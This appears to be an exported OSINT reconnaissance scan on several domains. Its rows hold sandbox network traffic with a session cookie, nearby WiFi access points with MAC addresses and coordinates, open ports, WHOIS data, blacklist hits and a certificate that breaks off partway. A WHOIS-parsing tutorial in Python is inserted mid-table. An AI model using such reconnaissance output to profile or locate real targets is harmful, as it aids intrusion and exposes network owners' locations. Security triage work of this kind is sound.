| 2023-05-12 02:55:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sable.madmimi.com/c/350165?id=104678088.24978.1.0781e25dd519058dcc1e324360776227', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.71.248.145:443"\n "35.162.153.72:443"\n "142.250.188.10:443"\n "13.227.74.13:443"\n "52.0.34.104:443"\n "151.139.128.10:443"\n "52.92.176.144:443"\n "104.17.24.14:443"\n "185.199.109.153:443"\n "104.37.183.1:443"\n "142.251.46.163:443"\n "142.250.188.3:443"\n "91.199.212.148:443"\n "142.251.32.46:443"\n "5.101.71.73:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"addtocalendar.com"\n "cdnjs.cloudflare.com"\n "code.jivosite.com"\n "images.dmca.com"\n "sable.madmimi.com"\n "secure.comodo.com"\n "secure.trust-provider.com"\n "www.audiocompliance.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped 
file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC3B6.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3576"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IE_EarlyTabStart_0xab8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_ConnHashTable<3576>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_df8_IESQMMUTEX_0_519"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC3A5.tmp" has type "Microsoft Cabinet archive data 
Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabC3B5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap-side-notes_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "Finance__Tax_Payroll_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1867x719 components 3"- [targetUID: N/A]\n "landingv4_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002452]\n "DMCA_logo-grn-btn120w_1_.png" has type "PNG image data 120 x 43 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "atc-style-glow-orange_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "S6u9w4BMUTPHh6UVSwiPHw_1_.woff" has type "Web Open Font Format TrueType length 28044 version 1.1"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpbCIPrc_1_.woff" has type "Web Open Font Format TrueType length 26196 version 1.1"- [targetUID: 
N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "cart-banner2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data little-endian direntries=4 xresolution=62 yresolution=70 resolutionunit=2] baseline precision 8 480x150 components 3"- [targetUID: N/A]\n "footer-logo_1_.png" has type "PNG image data 250 x 85 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "S6uyw4BMUTPHjx4wWA_1_.woff" has type "Web Open Font Format TrueType length 28648 version 1.1"- [targetUID: N/A]\n "jquery.form_1_.js" has type "ASCII text"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "elastic_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "_6B71C3D0-ADBF-11ED-8536-0800272665FE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Dayna_J_1_._Reum" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 75" baseline precision 8 200x200 components 3"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25916 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /c/350165?id=104678088.24978.1.0781e25dd519058dcc1e324360776227 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sable.madmimi.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 302 Found\nContent-Length: 0\nConnection: keep-alive\nStatus: 302 Found\nLocation: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nDate: Thu, 16 Feb 2023 07:01:48 GMT\nX-Powered-By: Phusion Passenger(R) Enterprise 6.0.17\nServer: nginx + Phusion Passenger(R) 6.0.17"\n "GET /assets/theme/css/bootstrap.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "GET /product/ac/form-941-compliance-2022 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.audiocompliance.com"\n "GET /assets/theme/css/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "GET /assets/theme/css/swiper.css HTTP/1.1\nAccept: text/css, */*\nReferer: 
https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "HTTP/1.1 200 OK\nServer: nginx/ | 185.199.109.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | re927421 (Net ID: 00:02:8A:40:D2:92) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DPRWirelessScottsdale (Net ID: 00:02:6F:FD:3F:B2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:465 | 87.248.157.102 |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Turkey | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S. is a domain name registrar accredited by ICANN,
the international domain name registration authority.
It has no connection whatsoever with the content or publication of the website under this domain name.
It only acts as an intermediary for the registration of the domain name within the framework of ICANN rules.
The information supplied by the holder of this domain name at registration is shown above.
NICS Telekomunikasyon A.S. cannot guarantee the accuracy of this information.
For further information you may write to info [at] nicproxy.com.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
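The WHOIS row above is raw port-43 output: key/value lines with inconsistent spacing before the colon ("Registry Domain ID : ..."), repeated keys (two Name Server lines), URL values that themselves contain colons, and legal boilerplate around the record. The following added example, not part of the scan output, parses such a reply into fields and pulls out what a triage analyst reads first: domain age, registrar IANA ID and abuse contact, EPP status, name servers (here Cloudflare's), DNSSEC state and which contact fields are privacy-redacted. WHOIS_TEXT is a constructed excerpt whose key/value lines are copied from the KEYUBU.NET record above; the function names are this example's own. Age is computed against the server's own "Last update" stamp rather than the wall clock, so the result is reproducible from an archived reply.

```python
"""Parse a port-43 WHOIS reply into fields and triage it (added example)."""
import re
from datetime import datetime, timezone

# Constructed excerpt: key/value lines copied from the KEYUBU.NET record,
# boilerplate trimmed to a single line.
WHOIS_TEXT = """\
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Domain Status: ok http://www.icann.org/epp#OK
Registrant Name: Redacted for Privacy
Registrant City: ADANA
Registrant Country: TR
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
"""

# "Key: value" with optional whitespace before the colon. The key is matched
# lazily so it stops at the FIRST colon and URL values keep their "http:".
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 /]*?)\s*:\s*(.*)$")
LAST_UPDATE_RE = re.compile(r">>>Last update of WHOIS database:\s*(\S+)<<<")
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_whois(text):
    """Return {lowercased key: [values...]}; repeated keys accumulate."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:  # banners, legal text, '>>>' markers
            continue
        key, value = m.group(1).strip().lower(), m.group(2).strip()
        fields.setdefault(key, []).append(value)
    return fields


def reference_time(text):
    """Use the server's own 'Last update' stamp as 'now' when present."""
    m = LAST_UPDATE_RE.search(text)
    if m:
        return datetime.strptime(m.group(1), TS_FMT).replace(tzinfo=timezone.utc)
    return datetime.now(timezone.utc)


def triage(text):
    """Summarise the fields an analyst checks first on a WHOIS record."""
    f = parse_whois(text)
    now = reference_time(text)
    created = datetime.strptime(f["creation date"][0], TS_FMT).replace(tzinfo=timezone.utc)
    ns = [n.lower().rstrip(".") for n in f.get("name server", [])]
    return {
        "domain": f["domain name"][0].lower(),
        "age_days": (now - created).days,
        "registrar_iana_id": int(f["registrar iana id"][0]),
        "abuse_contact": f.get("registrar abuse contact email", [None])[0],
        "epp_status": [v.split()[0] for v in f.get("domain status", [])],
        "nameservers": ns,
        "cloudflare_ns": bool(ns) and all(n.endswith(".ns.cloudflare.com") for n in ns),
        "dnssec": f.get("dnssec", ["unknown"])[0].lower(),
        "redacted_fields": sorted(k for k, v in f.items()
                                  if any("redacted" in x.lower() for x in v)),
    }


if __name__ == "__main__":
    for k, v in triage(WHOIS_TEXT).items():
        print(f"{k:20} {v}")
```

Registrar and registry replies differ in field names and spacing; keeping the parser key-agnostic (any "Key: value" line, multi-valued) and normalising only at the triage layer is what lets the same code handle both halves of a thick/thin WHOIS pair.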
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | E-A (Net ID: 00:14:C1:05:69:7C) | 40.2024, 29.0398 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007.github.io] https://www.openphish.com/feed.txt | 007.github.io |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.85): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request; Server: cloudflare; Date: <REDACTED>; Content-Type: text/html; Content-Length: 253; Connection: close; CF-RAY: - | 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Badazz-net (Net ID: 00:14:5C:88:1A:C4) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 03:16:23 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Amsterdam, North Holland, NH, Netherlands, NL | 188.114.96.1 |
| 2023-05-12 02:54:38 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 13335 | 172.67.168.252 |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.1): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE623 (Net ID: 00:00:85:F5:03:9F) | 37.780462,-122.390564 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
